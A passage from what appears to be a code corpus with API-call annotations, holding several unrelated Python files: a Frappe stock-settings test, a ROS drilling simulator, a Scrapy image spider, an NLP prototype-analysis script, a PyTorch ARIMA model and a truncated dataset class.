5263), False, 'from task.models import Task, detect_group\n'), ((5747, 5781), 'task.models.Task.get_nav_role', 'Task.get_nav_role', (['self.config.app'], {}), '(self.config.app)\n', (5764, 5781), False, 'from task.models import Task, detect_group\n'), ((6115, 6185), 'task.models.detect_group', 'detect_group', (['self.request.user', 'self.config.app', '"""role"""', 'nav_role', '""""""'], {}), "(self.request.user, self.config.app, 'role', nav_role, '')\n", (6127, 6185), False, 'from task.models import Task, detect_group\n'), ((8203, 8226), 'glob.glob', 'glob.glob', (["(path + '/*/')"], {}), "(path + '/*/')\n", (8212, 8226), False, 'import os, time, mimetypes, glob\n'), ((868, 902), 'task.models.Task.get_nav_role', 'Task.get_nav_role', (['self.config.app'], {}), '(self.config.app)\n', (885, 902), False, 'from task.models import Task, detect_group\n'), ((958, 1008), 'task.models.Task.get_active_nav_item', 'Task.get_active_nav_item', 
(['user_id', 'self.config.app'], {}), '(user_id, self.config.app)\n', (982, 1008), False, 'from task.models import Task, detect_group\n'), ((2565, 2581), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2572, 2581), False, 'from django.urls import reverse\n'), ((2621, 2655), 'django.urls.reverse', 'reverse', (["(self.config.app + ':list')"], {}), "(self.config.app + ':list')\n", (2628, 2655), False, 'from django.urls import reverse\n'), ((7170, 7194), 'django.utils.translation.gettext_lazy', '_', (['self.config.app_title'], {}), '(self.config.app_title)\n', (7171, 7194), True, 'from django.utils.translation import gettext_lazy as _\n'), ((9120, 9164), 'os.scandir', 'os.scandir', (['(self.store_dir + self.cur_folder)'], {}), '(self.store_dir + self.cur_folder)\n', (9130, 9164), False, 'import os, time, mimetypes, glob\n'), ((6325, 6393), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'nav_role'], {}), '(self.request.user.id, self.config.app, nav_role)\n', (6344, 6393), False, 'from task.models import Task, detect_group\n'), ((9452, 9476), 'mimetypes.guess_type', 'mimetypes.guess_type', (['ff'], {}), '(ff)\n', (9472, 9476), False, 'import os, time, mimetypes, glob\n'), ((1702, 1710), 'django.utils.translation.gettext_lazy', '_', (['"""add"""'], {}), "('add')\n", (1703, 1710), True, 'from django.utils.translation import gettext_lazy as _\n'), ((798, 818), 'django.utils.translation.gettext_lazy', '_', (['self.config.title'], {}), '(self.config.title)\n', (799, 818), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4634, 4651), 'django.utils.translation.gettext_lazy', '_', (["value['title']"], {}), "(value['title'])\n", (4635, 4651), True, 'from django.utils.translation import gettext_lazy as _\n'), ((6530, 6635), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'self.config.cur_view_group.view_id', 'item'], {}), 
'(self.request.user.id, self.config.app, self.config.\n cur_view_group.view_id, item)\n', (6549, 6635), False, 'from task.models import Task, detect_group\n'), ((2390, 2400), 'django.utils.translation.gettext_lazy', '_', (['sort[1]'], {}), '(sort[1])\n', (2391, 2400), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4217, 4234), 'django.utils.translation.gettext_lazy', '_', (["value['title']"], {}), "(value['title'])\n", (4218, 4234), True, 'from django.utils.translation import gettext_lazy as _\n'), ((9786, 9806), 'os.path.getmtime', 'os.path.getmtime', (['ff'], {}), '(ff)\n', (9802, 9806), False, 'import os, time, mimetypes, glob\n'), ((9892, 9911), 'os.path.getsize', 'os.path.getsize', (['ff'], {}), '(ff)\n', (9907, 9911), False, 'import os, time, mimetypes, glob\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStockSettings(unittest.TestCase):
	"""Verify that the ``clean_description_html`` Stock Setting strips inline
	styling markup from Item descriptions.

	The two original tests duplicated the item fixture and the expected
	strings; both are now shared via class constants and private helpers.
	"""

	# Raw description as entered, full of inline <span> styling.
	RAW_DESCRIPTION = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
	# Expected description after cleaning: styling gone, text and <br> kept.
	CLEAN_DESCRIPTION = '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>'

	def setUp(self):
		# Start each test with cleaning disabled so the test controls when
		# it is switched on.
		frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)

	def _enable_clean_description_html(self):
		"""Turn on description cleaning in Stock Settings and save."""
		settings = frappe.get_single('Stock Settings')
		settings.clean_description_html = 1
		settings.save()

	def _make_test_item(self):
		"""Insert and return a throwaway Item carrying the raw description."""
		return frappe.get_doc(dict(
			doctype = 'Item',
			item_code = 'Item for description test',
			item_group = 'Products',
			description = self.RAW_DESCRIPTION
		)).insert()

	def test_settings(self):
		"""Enabling the setting after insert cleans descriptions on settings save."""
		item = self._make_test_item()
		self._enable_clean_description_html()
		item.reload()
		self.assertEqual(item.description, self.CLEAN_DESCRIPTION)
		item.delete()

	def test_clean_html(self):
		"""With the setting already on, the description is cleaned at insert time."""
		self._enable_clean_description_html()
		item = self._make_test_item()
		self.assertEqual(item.description, self.CLEAN_DESCRIPTION)
		item.delete()
| [
"frappe.get_single",
"frappe.db.set_value"
] | [((247, 319), 'frappe.db.set_value', 'frappe.db.set_value', (['"""Stock Settings"""', 'None', '"""clean_description_html"""', '(0)'], {}), "('Stock Settings', None, 'clean_description_html', 0)\n", (266, 319), False, 'import frappe\n'), ((837, 872), 'frappe.get_single', 'frappe.get_single', (['"""Stock Settings"""'], {}), "('Stock Settings')\n", (854, 872), False, 'import frappe\n'), ((1176, 1211), 'frappe.get_single', 'frappe.get_single', (['"""Stock Settings"""'], {}), "('Stock Settings')\n", (1193, 1211), False, 'import frappe\n')] |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random
# Candidate material strengths; each generated layer is assigned one of
# these values at random (see getNextLayerStrength below).
possibleLayers = [140, 50, 80, 200, 100]
# Latest drill position (module global), updated by position_callback as
# messages arrive on /drill_motor/cur_position.
cur_position = 0.0
def position_callback(msg):
    """Cache the most recent drill position.

    Args:
        msg: std_msgs.msg.Float64 message; its .data field carries the
            current drill position.
    """
    global cur_position
    cur_position = msg.data
#Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
    """Generate a random layer profile, then publish the material strength
    at the drill's current position at 10 Hz until ROS shuts down or the
    drill passes the last generated layer entry.
    """
    # NOTE(review): numLayers is computed but never used; kept so the RNG
    # sequence (and thus generated profiles) is unchanged.
    numLayers = random.randint(10,20)
    a = 1
    layers = []
    while (a < 1000):
        # Pick a random boundary beyond 'a'; the gap is this layer's size.
        size = random.randint(a + 1,1000) - a
        strength = getNextLayerStrength()
        setNextLayer(size,strength,layers)
        a = a + size
    pub = rospy.Publisher('material_strength', Float64, queue_size = 10)
    rospy.init_node('layers_node', anonymous=True)
    rate = rospy.Rate(10)
    rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
    # Bound the index by the actual list length: the generated profile can
    # be slightly shorter than 1000 entries, so the original condition
    # (cur_position < 1000) risked an IndexError near the bottom.
    while((not rospy.is_shutdown()) and cur_position < len(layers)):
        pub.publish(layers[int(cur_position)])
        rate.sleep()
#Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
    """Return a strength drawn uniformly at random from possibleLayers."""
    last_index = len(possibleLayers) - 1
    return possibleLayers[random.randint(0, last_index)]
#Build the next layer of the simulation.
def setNextLayer(size,strength,layers):
    """Append `size` entries of `strength` to `layers` in place.

    Fixes an off-by-one: the original `for i in range(1, size)` appended
    only size - 1 entries, leaving the layer list shorter than the depth
    accounted for by the caller's position counter.
    """
    layers.extend([strength] * size)
if __name__ == '__main__':
    runLayersSim()
| [
"rospy.Subscriber",
"rospy.is_shutdown",
"rospy.init_node",
"rospy.Rate",
"rospy.Publisher",
"random.randint"
] | [((343, 365), 'random.randint', 'random.randint', (['(10)', '(20)'], {}), '(10, 20)\n', (357, 365), False, 'import random\n'), ((575, 635), 'rospy.Publisher', 'rospy.Publisher', (['"""material_strength"""', 'Float64'], {'queue_size': '(10)'}), "('material_strength', Float64, queue_size=10)\n", (590, 635), False, 'import rospy\n'), ((642, 688), 'rospy.init_node', 'rospy.init_node', (['"""layers_node"""'], {'anonymous': '(True)'}), "('layers_node', anonymous=True)\n", (657, 688), False, 'import rospy\n'), ((700, 714), 'rospy.Rate', 'rospy.Rate', (['(10)'], {}), '(10)\n', (710, 714), False, 'import rospy\n'), ((719, 792), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/drill_motor/cur_position"""', 'Float64', 'position_callback'], {}), "('/drill_motor/cur_position', Float64, position_callback)\n", (735, 792), False, 'import rospy\n'), ((428, 455), 'random.randint', 'random.randint', (['(a + 1)', '(1000)'], {}), '(a + 1, 1000)\n', (442, 455), False, 'import random\n'), ((808, 827), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (825, 827), False, 'import rospy\n')] |
import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..items import ImagescraperItem
class ImageCrawlSpiderSpider(CrawlSpider):
    """Crawl books.toscrape.com catalogue pages and yield book cover images."""

    name = "image_crawl_spider"
    allowed_domains = ["books.toscrape.com"]

    def start_requests(self):
        """Seed the crawl at the site root."""
        yield scrapy.Request(url="http://books.toscrape.com/")

    # Follow every catalogue link and hand each page to parse_image.
    rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)

    def parse_image(self, response):
        """Extract the active carousel image, make its src absolute, and
        yield it as an ImagescraperItem ("image_urls" must be absolute)."""
        if response.xpath('//div[@class="item active"]/img').get() is None:
            return
        rel_src = response.xpath('//div[@class="item active"]/img/@src').get()
        # The src is relative (prefixed with "../../"); strip that prefix
        # and join the remainder onto the site root.
        tail = re.match(r"^(?:../../)(.*)$", rel_src).group(1)
        site_root = "http://books.toscrape.com/"
        absolute_url = "".join([site_root, tail])
        item = ImagescraperItem()
        item["image_urls"] = [absolute_url]  # "image_urls" must be a list
        yield item
| [
"scrapy.Request",
"scrapy.linkextractors.LinkExtractor",
"re.match"
] | [((364, 387), 'scrapy.Request', 'scrapy.Request', ([], {'url': 'url'}), '(url=url)\n', (378, 387), False, 'import scrapy\n'), ((407, 440), 'scrapy.linkextractors.LinkExtractor', 'LinkExtractor', ([], {'allow': '"""catalogue/"""'}), "(allow='catalogue/')\n", (420, 440), False, 'from scrapy.linkextractors import LinkExtractor\n'), ((852, 885), 're.match', 're.match', (['"""^(?:../../)(.*)$"""', 'img'], {}), "('^(?:../../)(.*)$', img)\n", (860, 885), False, 'import re\n')] |
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
    """Accumulator for per-POS precision/recall/F1 bookkeeping.

    `nume`, `denom_p`, `denom_r` hold raw counts; `precision`, `recall`
    and `f1` are derived scores filled in by the caller after counting.
    """
    def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
        super(ExtractMetric, self).__init__()
        self.nume, self.denom_p, self.denom_r = nume, denom_p, denom_r
        self.precision, self.recall, self.f1 = precision, recall, f1
self.f1 = f1
def read_file(fname, len_cut):
    """Read a TSV of (prototype, example) pairs from `fname`.

    Pairs where either side has more than `len_cut` whitespace-separated
    tokens are dropped.

    Returns:
        (list of first-column strings, list of second-column strings)
    """
    firsts, seconds = [], []
    with open(fname) as fin:
        for line in fin:
            left, right = line.rstrip().split('\t')
            if len(left.split()) <= len_cut and len(right.split()) <= len_cut:
                firsts.append(left)
                seconds.append(right)
    return firsts, seconds
return res1, res2
def write_file(fname: str, data: List[str]):
    """Write one entry of `data` per line to `fname`.

    Entries that are lists are joined with single spaces; anything else is
    written as-is.
    """
    with open(fname, 'w') as fout:
        for entry in data:
            text = ' '.join(entry) if isinstance(entry, list) else entry
            fout.write('{}\n'.format(text))
def eval_edit(prototype, example):
    """Align each (prototype, example) sentence pair token-by-token with
    edlib and tally the edit operations, broken down by POS tag.

    Args:
        prototype: iterable of stanza Sentence objects (prototype side).
        example: iterable of stanza Sentence objects (example side).

    Returns:
        dict mapping edit op ('=', 'X', 'I', 'D') to a Counter of POS-level
        descriptions, e.g. res['X']['NOUN->VERB'] counts NOUN tokens
        substituted by VERB tokens.
    """
    def flat_cigar(cigar):
        """flatten the result path returned by edlib.align
        """
        # The cigar string is run-length encoded ("3=1X2I..."); expand each
        # count-prefixed op into that many single-character ops.
        r = []
        pointer = 0
        while pointer < len(cigar):
            num = []
            while cigar[pointer].isdigit():
                num.append(cigar[pointer])
                pointer += 1
            num = int(''.join(num))
            r.extend([cigar[pointer]] * num)
            pointer += 1
        return r
    res = {}
    for p_sent, e_sent in zip(prototype, example):
        p_pos = [x.upos for x in p_sent.words]
        e_pos = [x.upos for x in e_sent.words]
        p_text = [x.text for x in p_sent.words]
        e_text = [x.text for x in e_sent.words]
        # Token-level alignment: example is the query, prototype the target.
        edit_operation = edlib.align(e_text, p_text, task='path')
        edit_operation = flat_cigar(edit_operation['cigar'])
        # Build gap-padded token/POS sequences; -1 marks a gap so that both
        # sides have one entry per edit operation.
        new_p_text = []
        new_e_text = []
        new_p_pos = []
        new_e_pos = []
        src_cur = tgt_cur = 0
        for edit in edit_operation:
            if edit == '=' or edit == 'X':
                # Match or substitution consumes one token on each side.
                new_p_text.append(p_text[src_cur])
                new_p_pos.append(p_pos[src_cur])
                new_e_text.append(e_text[tgt_cur])
                new_e_pos.append(e_pos[tgt_cur])
                src_cur += 1
                tgt_cur += 1
            elif edit == 'I':
                # Insertion: token present only on the example side.
                new_p_text.append(-1)
                new_p_pos.append(-1)
                new_e_text.append(e_text[tgt_cur])
                new_e_pos.append(e_pos[tgt_cur])
                tgt_cur += 1
            elif edit == 'D':
                # Deletion: token present only on the prototype side.
                new_p_text.append(p_text[src_cur])
                new_p_pos.append(p_pos[src_cur])
                new_e_text.append(-1)
                new_e_pos.append(-1)
                src_cur += 1
            else:
                raise ValueError('{} edit operation is invalid!'.format(edit))
        # Second pass: tally each operation keyed by the POS tags involved.
        for i, edit in enumerate(edit_operation):
            if edit not in res:
                res[edit] = Counter()
            if edit == '=':
                res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
            elif edit == 'X':
                res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
            elif edit == 'I':
                res[edit]['+{}'.format(new_e_pos[i])] += 1
            elif edit == 'D':
                res[edit]['-{}'.format(new_p_pos[i])] += 1
            else:
                raise ValueError
    return res
return res
def eval_f1(prototype, example):
    """Compute per-POS precision/recall/F1 of token overlap between
    prototype and example sentences.

    A prototype token counts as matched if the same surface form is still
    available in the example sentence (multiset overlap); matches are
    credited to the prototype token's POS tag. Precision denominators come
    from example-side POS counts, recall denominators from the prototype
    side.

    Returns:
        dict mapping POS tag -> ExtractMetric with populated scores.
    """
    stats = {}

    def metric_for(tag):
        # Lazily create the accumulator for a POS tag.
        if tag not in stats:
            stats[tag] = ExtractMetric(
                nume=0,
                denom_p=0,
                denom_r=0,
                precision=0,
                recall=0,
                f1=0
            )
        return stats[tag]

    for proto_sent, ex_sent in zip(prototype, example):
        proto_tokens = [(w.text, w.upos) for w in proto_sent.words]
        remaining = Counter(w.text for w in ex_sent.words)
        for word, tag in proto_tokens:
            entry = metric_for(tag)
            entry.denom_r += 1
            if remaining[word] > 0:
                remaining[word] -= 1
                entry.nume += 1
        for tag, count in Counter(w.upos for w in ex_sent.words).items():
            metric_for(tag).denom_p += count
    for tag, entry in stats.items():
        if entry.denom_p != 0 and entry.denom_r != 0 and entry.nume != 0:
            entry.precision = entry.nume / entry.denom_p
            entry.recall = entry.nume / entry.denom_r
            entry.f1 = 2 * entry.precision * entry.recall / (entry.precision + entry.recall)
    return stats
def sentence_bleu(ref_path, hypo_path):
    """Run fairseq-score in sentence-BLEU mode and return the mean
    sentence-level BLEU over the corpus."""
    cmd = "fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path)
    output = subprocess.getoutput(cmd)
    # Skip the header line; field 3 of each remaining line is "<bleu>,".
    scores = [float(line.split()[3].rstrip(',')) for line in output.split('\n')[1:]]
    return sum(scores) / len(scores)
def generate_rand_prototype(exp_dir, num):
    """Sample `num` random prototype sentences via `shuf` from the template
    file of the dataset implied by the experiment directory name.

    The dataset key is the last path component's prefix before the first
    underscore. NOTE(review): because of that split('_')[0], a directory
    named "yelp_large_..." maps to "yelp", so the "yelp_large" entry looks
    unreachable — confirm the expected directory naming.
    """
    dataset_to_template = {
        "coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
        "yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
        "yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
    }
    dataset = exp_dir.rstrip('/').split('/')[-1].split('_')[0]
    template = dataset_to_template[dataset]
    shuffled = subprocess.getoutput("shuf -n {} {}".format(num, template))
    return shuffled.split('\n')
# ---- Top-level analysis driver: runs on import/execution. ----
# Compares prototype vs. example sentences with surface BLEU, POS BLEU,
# per-POS precision/recall/F1, and edlib edit-operation statistics, writing
# all results to analysis_<prefix>_res.txt in the experiment directory.
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
                    help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
# Effectively no length filtering: pairs longer than 1000 tokens are rare.
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
# Intermediate files written for the external BLEU scorer.
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
# Random prototypes provide a chance-level baseline for every metric below.
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
# tokenize_pretokenized=True: sentences are already whitespace-tokenized,
# one sentence per line of the joined string.
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
#     "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
# Baseline F1 first, sorted by descending F1.
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
    fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
    fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
# Sort edit-op categories by descending frequency.
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
    fout.write('{}: {}\n'.format(k, sum(v.values())))
    for k1, v1 in v.most_common():
        fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
    fout.write('\n\n')
fout.close()
| [
"edlib.align",
"argparse.ArgumentParser",
"os.path.join",
"collections.Counter",
"stanza.Pipeline"
] | [((6056, 6120), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Evaluate analysis metrics"""'}), "(description='Evaluate analysis metrics')\n", (6079, 6120), False, 'import argparse\n'), ((6576, 6619), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype.txt"""'], {}), "(args.exp_dir, 'prototype.txt')\n", (6588, 6619), False, 'import os\n'), ((6641, 6688), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_pos.txt"""'], {}), "(args.exp_dir, 'prototype_pos.txt')\n", (6653, 6688), False, 'import os\n'), ((6712, 6760), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_rand.txt"""'], {}), "(args.exp_dir, 'prototype_rand.txt')\n", (6724, 6760), False, 'import os\n'), ((6787, 6839), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_pos_rand.txt"""'], {}), "(args.exp_dir, 'prototype_pos_rand.txt')\n", (6799, 6839), False, 'import os\n'), ((6856, 6897), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""example.txt"""'], {}), "(args.exp_dir, 'example.txt')\n", (6868, 6897), False, 'import os\n'), ((6917, 6962), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""example_pos.txt"""'], {}), "(args.exp_dir, 'example_pos.txt')\n", (6929, 6962), False, 'import os\n'), ((7842, 7931), 'stanza.Pipeline', 'stanza.Pipeline', ([], {'lang': '"""en"""', 'processors': '"""tokenize,mwt,pos"""', 'tokenize_pretokenized': '(True)'}), "(lang='en', processors='tokenize,mwt,pos',\n tokenize_pretokenized=True)\n", (7857, 7931), False, 'import stanza\n'), ((1871, 1911), 'edlib.align', 'edlib.align', (['e_text', 'p_text'], {'task': '"""path"""'}), "(e_text, p_text, task='path')\n", (1882, 1911), False, 'import edlib\n'), ((3907, 3922), 'collections.Counter', 'Counter', (['e_text'], {}), '(e_text)\n', (3914, 3922), False, 'from collections import Counter\n'), ((4420, 4434), 'collections.Counter', 'Counter', (['e_pos'], {}), '(e_pos)\n', (4427, 4434), False, 'from collections import Counter\n'), ((3122, 
3131), 'collections.Counter', 'Counter', ([], {}), '()\n', (3129, 3131), False, 'from collections import Counter\n')] |
""" The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
    """A minimal ARIMA model with learnable coefficient tensors.

    NOTE(review): as written, ``forward`` implements the ARIMA(0, 1, 1)
    update only (see its docstring); ``pWeights`` is allocated but never
    used, and ``drift`` is created without requires_grad and is never
    updated by ``fit`` — confirm whether that is intentional.
    """
    def __init__(self,
                 p: int = 0,
                 d: int = 0,
                 q: int = 0) -> None:
        """__init__ General ARIMA model constructor.
        Args:
            p (int): The number of lag observations included in the model,
                also called the lag order.
            d (int): The number of times that the raw observations are
                differenced, also called the degree of differencing.
            q (int): The size of the moving average window,
                also called the order of moving average.
        """
        super(ARIMA, self).__init__()
        self.p = p
        # AR coefficients; unused by forward() as currently implemented.
        self.pWeights = torch.rand(p)
        self.pWeights.requires_grad = True
        self.q = q
        # MA coefficients, updated manually in fit().
        self.qWeights = torch.rand(q)
        self.qWeights.requires_grad = True
        self.d = d
        # Differencing coefficients, updated manually in fit().
        self.dWeights = torch.rand(d)
        self.dWeights.requires_grad = True
        # Constant drift term; requires_grad is NOT set, so it stays fixed.
        self.drift = torch.rand(1)
        pass
    def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
        """forward the function that defines the ARIMA(0,1,1) model.
        It was written specifically for the case of ARIMA(0,1,1).
        Args:
            x (torch.Tensor): The input data. All the past observations
            err (torch.Tensor): The error term. A normal distribution vector.
        Returns:
            torch.Tensor: The output of the model. The current prediction.
        """
        # Difference the series, then predict the next difference from the
        # last difference, the two most recent noise terms, and the drift.
        zData = torch.diff(x)
        zPred = self.dWeights*zData[-1] + \
            self.qWeights*err[-2] + err[-1] + self.drift
        # Undo the differencing: add the last observation back.
        aPred = zPred + x[-1]
        return aPred
    def generateSample(self, length: int) -> torch.Tensor:
        """generateSample An helper function to generate a sample of data.
        Args:
            length (int): The length of the sample.
        Returns:
            torch.Tensor: The generated sample.
        """
        sample = torch.zeros(length)
        noise = torch.tensor(np.random.normal(
            loc=0, scale=1, size=length), dtype=torch.float32)
        sample[0] = noise[0]
        # Filling starts at index 2 (forward needs two past points), so
        # sample[1] is never assigned and stays 0.
        with torch.no_grad():
            for i in range(length-2):
                sample[i+2] = self.forward(sample[:i+2], noise[:i+2])
            pass
        return sample
    def fit(self,
            trainData: torch.Tensor,
            epochs: int,
            learningRate: float) -> None:
        """fit A function to fit the model. It is a wrapper of the
        Args:
            trainData (torch.Tensor): The training data.
            epochs (int): The number of epochs.
            learningRate (float): The learning rate.
        """
        dataLength = len(trainData)
        # Fixed noise vector sampled once and reused across all epochs.
        errors = torch.tensor(np.random.normal(
            loc=0, scale=1, size=dataLength), dtype=torch.float32)
        for epoch in range(epochs):
            # prediction[0] and prediction[1] are never assigned and stay
            # 0, so they contribute a constant term to the loss.
            prediction = torch.zeros(dataLength)
            for i in range(dataLength-2):
                prediction[i +
                           2] = self.forward(trainData[0:i+2], errors[0:i+2])
                pass
            loss = torch.mean(torch.pow(trainData - prediction, 2))
            print(f'Epoch {epoch} Loss {loss}')
            # The graph is rebuilt each epoch by the forward calls above,
            # so backward() per epoch is valid here.
            loss.backward()
            # Manual SGD step on d and q weights only; drift is untouched.
            self.dWeights.data = self.dWeights.data - \
                learningRate * self.dWeights.grad.data
            self.dWeights.grad.data.zero_()
            self.qWeights.data = self.qWeights.data - \
                learningRate * self.qWeights.grad.data
            self.qWeights.grad.data.zero_()
        pass
| [
"numpy.random.normal",
"torch.pow",
"torch.diff",
"torch.no_grad",
"torch.zeros",
"torch.rand"
] | [((789, 802), 'torch.rand', 'torch.rand', (['p'], {}), '(p)\n', (799, 802), False, 'import torch\n'), ((889, 902), 'torch.rand', 'torch.rand', (['q'], {}), '(q)\n', (899, 902), False, 'import torch\n'), ((989, 1002), 'torch.rand', 'torch.rand', (['d'], {}), '(d)\n', (999, 1002), False, 'import torch\n'), ((1067, 1080), 'torch.rand', 'torch.rand', (['(1)'], {}), '(1)\n', (1077, 1080), False, 'import torch\n'), ((1591, 1604), 'torch.diff', 'torch.diff', (['x'], {}), '(x)\n', (1601, 1604), False, 'import torch\n'), ((2054, 2073), 'torch.zeros', 'torch.zeros', (['length'], {}), '(length)\n', (2065, 2073), False, 'import torch\n'), ((2103, 2148), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(0)', 'scale': '(1)', 'size': 'length'}), '(loc=0, scale=1, size=length)\n', (2119, 2148), True, 'import numpy as np\n'), ((2226, 2241), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2239, 2241), False, 'import torch\n'), ((2835, 2884), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(0)', 'scale': '(1)', 'size': 'dataLength'}), '(loc=0, scale=1, size=dataLength)\n', (2851, 2884), True, 'import numpy as np\n'), ((2981, 3004), 'torch.zeros', 'torch.zeros', (['dataLength'], {}), '(dataLength)\n', (2992, 3004), False, 'import torch\n'), ((3207, 3243), 'torch.pow', 'torch.pow', (['(trainData - prediction)', '(2)'], {}), '(trainData - prediction, 2)\n', (3216, 3243), False, 'import torch\n')] |
#import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
    """Paired-sample dataset backed by two HDF5 files (A.h5 / B.h5).

    Follows the two-phase construction convention of pix2pix-style code:
    the constructor takes no arguments and ``initialize(opt)`` wires in
    the options object and opens the HDF5 files.
    """
    def __init__(self):
        super(rawdataDataset, self).__init__()

